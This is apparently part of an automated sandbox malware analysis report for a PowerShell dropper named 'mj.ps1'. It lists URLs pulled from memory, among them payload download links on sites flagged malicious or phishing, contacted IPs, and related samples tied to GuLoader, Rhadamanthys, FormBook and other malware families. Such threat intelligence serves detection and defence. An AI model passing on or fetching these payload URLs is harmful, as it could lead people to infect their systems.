www.almrwad.com           unknown          unknown  false      -                    unknown
www.erp-royal-crown.info  unknown          unknown  false      -                    unknown
Name                                                                         Malicious  Antivirus Detection       Reputation
https://www.pineappletech.ae/na/mg.vbs                                       true       Avira URL Cloud: malware  unknown
https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf  false      Avira URL Cloud: malware  unknown
https://www.erp-royal-crown.info/wh/Subordinerendes78.smi                    true       Avira URL Cloud: malware  unknown
https://www.almrwad.com/wh/Subordinerendes78.smi                             false      Avira URL Cloud: malware  unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.almrwad.com/wpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.fornid.com/ordinepowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.almrwad.com/wh/Subordinepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.almrwad.com/wh/Subordinerpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.fornid.com/wh/Listpowershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.microsoft.copowershell.exe, 00000001.00000002.1582421341.000002CDC2B50000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.almrwad.com/wh/Supowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.erp-royal-crown.info/wh/Subordinerenpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://www.almrwad.com/powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          http://www.erp-royal-crown.infopowershell.exe, 00000008.00000002.2573246202.0000013352F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://www.almrwad.cpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.erp-royal-crown.infopowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://www.fornid.com/90-maschere-per-saldaturapowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1575981920.000002CDBAA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1575981920.000002CDBABA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1395815006.000001D45E4E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.erp-royal-crown.info/wh/Subordinepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            unknown
                            http://www.pineappletech.aepowershell.exe, 00000001.00000002.1514726032.000002CDAC968000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.fornid.com/133-occhiali-protettivipowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.erp-royal-crown.ipowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.fornid.com/themes/PRS070158/css/megnor/custom.csspowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1514726032.000002CDAA9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44E471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.almrwad.com/wh/Subordinpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.erp-royal-crown.info/wh/powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://www.almrwad.com/wh/Subordinerendes7powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.almrwad.com/wh/Subordpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.fornid.com/contattacipowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.almrwad.com/wh/powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.almrwad.com/wh/Subordinerendespowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://go.micropowershell.exe, 00000001.00000002.1514726032.000002CDAB622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44EC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44F97A000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.pinfzgapplfzgtfzgch.afzg/na/mg.vbspowershell.exe, 00000001.00000002.1514726032.000002CDAC573000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.almrwad.compowershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.fornid.compowershell.exe, 00000001.00000002.1514726032.000002CDAC4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.almrwad.com/wh/Subordinerendepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.almrwad.com/wh/Subordinerendes78.spowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jspowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.almrwad.com/wh/Subordinerendes78.smpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fornid.com/powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://almrwad.compowershell.exe, 00000008.00000002.2573246202.0000013352E72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.fornid.com/144-filtri-per-mascherepowershell.exe, 00000001.00000002.1514726032.000002CDAC511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.almrwad.com/wh/Subordinerendes78powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.erp-royal-crown.info/wh/Subordpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: phishing
                                            unknown
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3powershell.exe, 00000001.00000002.1514726032.000002CDAC511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.erp-royal-crown.info/wpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://www.erp-royal-crown.powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://fornid.compowershell.exe, 00000001.00000002.1514726032.000002CDAC4EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.erp-royal-crown.info/wh/Subordinerepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://www.erp-royal-crown.info/whpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://www.fornid.com/sitemappowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoropowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.fornid.com/145-maschere-antigaspowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.almrwad.com/wh/Subordinerendpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.erp-royal-crown.info/wh/Subordipowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://www.erp-royal-crown.info/wh/Suborpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://www.fornid.com/il-mio-accountpowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.erp-royal-crown.info/wh/Subopowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://www.almrwad.compowershell.exe, 00000008.00000002.2573246202.0000013352E72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.almrwad.com/wh/Subordinerepowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.erp-royal-crown.inpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://go.microspowershell.exe, 00000004.00000002.1376648468.000001D44EC2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.almrwad.com/wh/Subordipowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.almrwad.copowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.almrwad.com/wh/Subordinerendes78.powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://erp-royal-crown.infopowershell.exe, 00000008.00000002.2573246202.0000013352F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://www.erp-royal-crown.info/wh/Subordinerendespowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://www.fornid.com/wh/List%20of%20rfzgquirfzgd%20itfzgms%20and%20sfzgrvicfzgs.pdfpowershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.erp-royal-crown.info/wh/Subordinerendes78.spowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://www.fornid.com/img/logo.jpgpowershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.almrwad.com/whpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.almrwad.com/wh/Subpowershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
https://www.erp-royal-crown.info/wh/Subordin | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: true | Avira URL Cloud: phishing | Reputation: unknown
https://www.almrwad.com/wh/Subo | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://blog.fornid.com/ | Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://nuget.org/NuGet.exe | Source: powershell.exe, 00000001.00000002.1575981920.000002CDBAA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1575981920.000002CDBABA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1395815006.000001D45E4E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.erp-royal-crown.info/wh/Subordinerendes78 | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: true | Avira URL Cloud: phishing | Reputation: unknown
http://www.fornid.com/content/13-international-shipments | Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://www.almrwad.com/wh/Subor | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://www.almrwad. | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://aka.ms/winsvr-2022-pshelpX | Source: powershell.exe, 00000004.00000002.1376648468.000001D44F97A000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js | Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.erp-royal-crown.info/wh/Subordinerendes7 | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: true | Avira URL Cloud: phishing | Reputation: unknown
http://www.fornid.com | Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC4EF000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://www.fornid.com/cerca | Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://www.erp-royal-crown.info/ | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: true | Avira URL Cloud: phishing | Reputation: unknown
https://www.almrwad.com/wh/Subordineren | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://www.erp-royal-crown.inf | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://www.erp-royal-crown.info/wh/Sub | Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmp | Malicious: true | Avira URL Cloud: phishing | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
91.193.42.13 | www.pineappletech.ae | Belgium | 48694 | ITFPL | false
93.95.216.175 | fornid.com | Italy | 52030 | SERVERPLAN-ASIT | true
148.251.114.233 | erp-royal-crown.info | Germany | 24940 | HETZNER-ASDE | false
184.171.244.231 | almrwad.com | United States | 33182 | DIMENOCUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569000
Start date and time: 2024-12-05 10:38:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: mj.ps1
Detection: MAL
Classification: mal100.expl.evad.winPS1@11/13@4/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 16
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7700 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8124 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 832 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: mj.ps1
Time | Type | Description
04:39:18 | API Interceptor | 2162569x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
91.193.42.13 | ni.ps1 | malicious | Unknown | -
91.193.42.13 | qc.ps1 | malicious | GuLoader, RHADAMANTHYS | -
91.193.42.13 | List of Required items and services.zip | malicious | GuLoader, RHADAMANTHYS | -
93.95.216.175 | ni.ps1 | malicious | Unknown | -
148.251.114.233 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
148.251.114.233 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
148.251.114.233 | PO5118000306 pdf.exe | malicious | FormBook | www.eslameldaramlly.site/fchs/
148.251.114.233 | PO23100072.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
148.251.114.233 | PO-000001488.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
148.251.114.233 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.eslameldaramlly.site/30vc/
184.171.244.231 | ni.ps1 | malicious | Unknown | -
184.171.244.231 | qc.ps1 | malicious | GuLoader, RHADAMANTHYS | -
184.171.244.231 | yd2.vbs | malicious | GuLoader, RHADAMANTHYS | -
184.171.244.231 | List of Required items and services.zip | malicious | GuLoader, RHADAMANTHYS | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.pineappletech.ae | ni.ps1 | malicious | Unknown | 91.193.42.13
www.pineappletech.ae | qc.ps1 | malicious | GuLoader, RHADAMANTHYS | 91.193.42.13
www.pineappletech.ae | List of Required items and services.zip | malicious | GuLoader, RHADAMANTHYS | 91.193.42.13
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ITFPL | ni.ps1 | malicious | Unknown | 91.193.42.13
ITFPL | qc.ps1 | malicious | GuLoader, RHADAMANTHYS | 91.193.42.13
ITFPL | List of Required items and services.zip | malicious | GuLoader, RHADAMANTHYS | 91.193.42.13
ITFPL | KgQJ0dIs3A.exe | malicious | Amadey, zgRAT | 91.193.43.180
ITFPL | 7GC8osUQMq.exe | malicious | Amadey | 91.193.43.180
ITFPL | Y3KkfxEZuo.exe | malicious | zgRAT | 91.193.43.180
ITFPL | wqb7dL448k.exe | malicious | Amadey, Xmrig, zgRAT | 91.193.43.180
ITFPL | Oupxwi.js | malicious | Qbot | 91.193.43.119
ITFPL | Nyyne.js | malicious | Qbot | 91.193.43.119
ITFPL | Nyyne.js | malicious | Unknown | 91.193.43.119
HETZNER-ASDE | ni.ps1 | malicious | Unknown | 148.251.114.233
HETZNER-ASDE | UPDATED CONTRACT.exe | malicious | FormBook | 88.99.61.52
HETZNER-ASDE | https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C | malicious | Captcha Phish, HTMLPhisher | 5.9.227.67
HETZNER-ASDE | Ttok18.exe | malicious | Vidar | 159.69.102.165
HETZNER-ASDE | jtkhikadjthsad.exe | malicious | Vidar | 159.69.102.165
HETZNER-ASDE | file.exe | malicious | Vidar | 159.69.102.165
